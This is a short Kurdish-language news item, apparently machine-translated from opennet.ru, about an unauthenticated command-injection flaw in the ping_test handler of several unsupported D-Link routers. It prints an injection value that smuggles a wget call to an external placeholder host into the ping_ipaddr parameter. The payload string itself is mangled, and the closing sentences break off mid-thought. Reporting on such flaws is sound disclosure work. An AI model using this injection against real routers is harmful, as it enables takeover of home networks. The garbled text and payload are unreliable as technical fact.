Di rêgezên wireless yên D-Link de
Balkêş e, li gorî pêşdebirên firmware, banga "ping_test" divê tenê piştî pejirandinê were darve kirin, lê di rastiyê de ew di her rewşê de tê gotin, bêyî ku têketina navgîniya malperê. Bi taybetî, dema ku xwe bigihînin skrîpta application_sec.cgi û derbaskirina parametreya "action=ping_test", skrîpt ber bi rûpela erêkirinê ve vedigere, lê di heman demê de çalakiya ku bi ping_test re têkildar e pêk tîne. Ji bo cîbicîkirina kodê, di ping_test bixwe de qelsiyek din hate bikar anîn, ku bêyî rastkirina rastdariya navnîşana IP-ya ku ji bo ceribandinê hatî şandin gazî amûra ping dike. Mînakî, ji bo gazîkirina amûra wget û veguheztina encamên fermana "echo 1234" ji mêvandarek derveyî re, tenê pîvana "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20" destnîşan bikin. test.test/?$( echo 1234)".
Hebûna qelsbûnê di modelên jêrîn de bi fermî hate pejirandin:
- DIR-655 bi firmware 3.02b05 an kevntir;
- DIR-866L bi firmware 1.03b04 an kevntir;
- DIR-1565 bi firmware 1.01 an kevntir;
- DIR-652 (tu agahî der barê guhertoyên firmware yên bi pirsgirêk nayên peyda kirin)
Demjimêra piştgiriyê ji bo van modelan jixwe qediyaye, ji ber vê yekê D-Link
Dûvre hat dîtin ku mexdûriyet jî heye
Source: opennet.ru